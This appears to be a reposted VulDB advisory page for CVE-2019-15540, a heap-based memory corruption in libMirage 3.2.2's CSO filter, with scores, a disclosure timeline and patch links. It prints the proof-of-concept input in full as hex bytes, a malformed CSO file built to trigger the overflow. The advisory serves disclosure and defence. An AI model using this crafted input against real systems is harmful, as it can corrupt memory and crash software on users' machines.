libMirage 3.2.2 CSO Filter filter-stream.c memory corruption – Digitalmunition




Exploit/Advisories Cybersecurity study of the dark web exposes vulnerability to machine identities -- ScienceDaily

Published on August 26th, 2019 📆 | 3252 Views ⚑

0

libMirage 3.2.2 CSO Filter filter-stream.c memory corruption

CVSS Meta Temp ScoreCurrent Exploit Price (≈)
4.7$0-$5k

A vulnerability was found in libMirage 3.2.2. It has been classified as problematic. Affected is an unknown part of the file filters/filter-cso/filter-stream.c of the component CSO Filter. The manipulation with an unknown input leads to a memory corruption vulnerability (Heap-based). CWE is classifying the issue as CWE-122. This is going to have an impact on confidentiality, integrity, and availability.

The weakness was released 08/25/2019 as unconfirmed bug report (GitHub Repository). The advisory is available at gist.github.com. This vulnerability is traded as CVE-2019-15540 since 08/25/2019. Local access is required to approach this attack. The successful exploitation needs a single authentication. Technical details and a public exploit are known.

After immediately, there has been an exploit disclosed. It is declared as proof-of-concept. The exploit is shared for download at gist.github.com. The code used by the exploit is:

43 49 53 4F 00 00 00 00 FF 00 00 00 00 00 00 FF
FF 00 00 00 00 30 00 00 00 00 00 00 61 61 00 00
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A
41 41 41 41 41 41 41 41

Applying a patch is able to eliminate this problem. The bugfix is ready for download at gist.github.com. A possible mitigation has been published immediately after the disclosure of the vulnerability.

Name

VulDB Meta Base Score: 5.3
VulDB Meta Temp Score: 4.7

VulDB Base Score: 5.3
VulDB Temp Score: 4.7
VulDB Vector: 🔒
VulDB Reliability: 🔍

AVACAuCIA
🔍🔍🔍🔍🔍🔍
🔍🔍🔍🔍🔍🔍
🔍🔍🔍🔍🔍🔍
VectorComplexityAuthenticationConfidentialityIntegrityAvailability
unlockunlockunlockunlockunlockunlock
unlockunlockunlockunlockunlockunlock
unlockunlockunlockunlockunlockunlock


VulDB Base Score: 🔒
VulDB Temp Score: 🔒
VulDB Reliability: 🔍
Class: Memory corruption / Heap-based (CWE-122)
Local: Yes
Remote: No

Availability: 🔒
Access: Public
Status: Proof-of-Concept
Download: 🔒

Price Prediction: 🔍
Current Price Estimation: 🔒

Threat Intelligenceinfoedit

Threat: 🔍
Adversaries: 🔍
Geopolitics: 🔍
Economy: 🔍
Predictions: 🔍
Remediation: 🔍Recommended: Patch
Status: 🔍

Reaction Time: 🔒
0-Day Time: 🔒
Exposure Time: 🔒
Exploit Delay Time: 🔍

Patch: gist.github.com

08/25/2019 Advisory disclosed
08/25/2019 +0 days Exploit disclosed
08/25/2019 +0 days Countermeasure disclosed
08/25/2019 +0 days CVE assigned
08/26/2019 +1 days VulDB entry created
08/26/2019 +0 days VulDB last updateAdvisory: gist.github.com
Status: Unconfirmed

CVE: CVE-2019-15540 (🔒)

Created: 08/26/2019 07:54 AM
Complete: 🔍

Download it now for free!

https://vuldb.com/?id.140766

Tagged with:



Leave a Reply